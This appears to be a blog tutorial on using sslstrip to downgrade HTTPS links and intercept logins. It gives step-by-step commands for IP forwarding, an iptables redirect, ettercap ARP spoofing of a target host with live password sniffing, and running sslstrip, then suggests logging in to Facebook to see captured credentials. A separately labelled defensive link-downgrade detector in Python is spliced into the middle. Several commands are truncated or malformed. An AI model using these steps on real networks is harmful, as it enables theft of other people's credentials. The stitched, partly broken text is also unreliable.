This tool doesn't perform a generic man-in-the-middle attack on SSL the way tools such as ettercap or Cain & Abel do. Those tools rely on the stupidity of users to accept a fake certificate in their web browser, which most of them still do. With SSLstrip, the wow factor of the whole concept is that 98% of the attack is transparent to the average user. According to the author, "sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects them, then map those links into either look-alike HTTP links or homograph-similar HTTPS links". In version 0.5, a neat feature was added: it also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
There is a decent explanation of how it works on the author's website that I'm gonna mostly mimic, with minor changes for better elaboration.
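A defender-side check for the link rewriting the author describes, as an added example that is not part of the original post or of sslstrip: it compares a known-good copy of a page with the copy a client received and reports HTTPS links that came back as HTTP, plus HTTPS links on new punycode or non-ASCII hosts. The function name, the sample pages and the `.example` hosts are constructed for illustration, and it assumes the reference copy was fetched over a trusted path.

```python
import re
from urllib.parse import urlsplit

# Absolute http(s) URLs in href/action/src attributes.
URL_ATTR = re.compile(r"""(?:href|action|src)\s*=\s*["'](https?://[^"']+)["']""", re.I)

# Constructed sample pages: REFERENCE is the known-good copy, RECEIVED is
# what arrived over the untrusted network path.
REFERENCE = (
    '<a href="https://login.example/signin">Sign in</a>'
    '<form action="https://login.example/session" method="post"></form>'
    '<img src="http://static.example/logo.png">'
)
RECEIVED = (
    '<a href="http://login.example/signin">Sign in</a>'
    '<form action="http://login.example/session" method="post"></form>'
    '<img src="http://static.example/logo.png">'
    '<a href="https://xn--lgin-5qa.example/signin">Sign in</a>'
)

def find_stripped_links(reference_html, received_html):
    """Return (downgraded, lookalike) URL lists from the received page.

    downgraded: URLs that were https in the reference but arrive as http.
    lookalike:  https URLs on hosts absent from the reference whose name
                is non-ASCII or punycode (possible homograph).
    """
    ref_https, ref_hosts = set(), set()
    for url in URL_ATTR.findall(reference_html):
        p = urlsplit(url)
        ref_hosts.add(p.hostname)
        if p.scheme == "https":
            ref_https.add((p.hostname, p.path, p.query))
    downgraded, lookalike = [], []
    for url in URL_ATTR.findall(received_html):
        p = urlsplit(url)
        host = p.hostname or ""
        if p.scheme == "http" and (host, p.path, p.query) in ref_https:
            downgraded.append(url)
        elif p.scheme == "https" and host not in ref_hosts:
            labels = host.split(".")
            if not host.isascii() or any(l.startswith("xn--") for l in labels):
                lookalike.append(url)
    return downgraded, lookalike

if __name__ == "__main__":
    print(find_stripped_links(REFERENCE, RECEIVED))
```

A plain-HTTP resource that was already HTTP in the reference copy (the logo image here) is not reported, so only genuine downgrades are flagged.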
- Python >= 2.4 (apt-get install python)
- The python "twisted-web" module (apt-get install twisted-web)
- # tar zxvf sslstrip-0.5.tar.gz //extract the contents from the compressed archive
- # cd sslstrip-0.5
- (Optional) # sudo python ./setup.py install //Installs to the appropriate directories. Not a necessity; it can already run out of the box.
- Flip your machine into forwarding mode. (# echo "1" > /proc/sys/net/ipv4/ip_forward)
- Setup iptables to redirect HTTP traffic to sslstrip. (# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
- Run ettercap to perform an arpspoof attack and also sniff out passwords on the fly and display them in real time. (# ettercap -Tq -i eth0 -M ARP:remote /10.0.0.2/ /10.00.1/)
- Run sslstrip. (# sslstrip.py -l
That's all there is to the magic. To test this, go to a website like Facebook and log on with some credentials (correct or incorrect) and, just after you do so, take a look at ettercap's interface. Did you notice anything confidential about yourself that Facebook and no one else should be allowed to know? AHHH.
Here's a nice video by John Strand demonstrating this attack: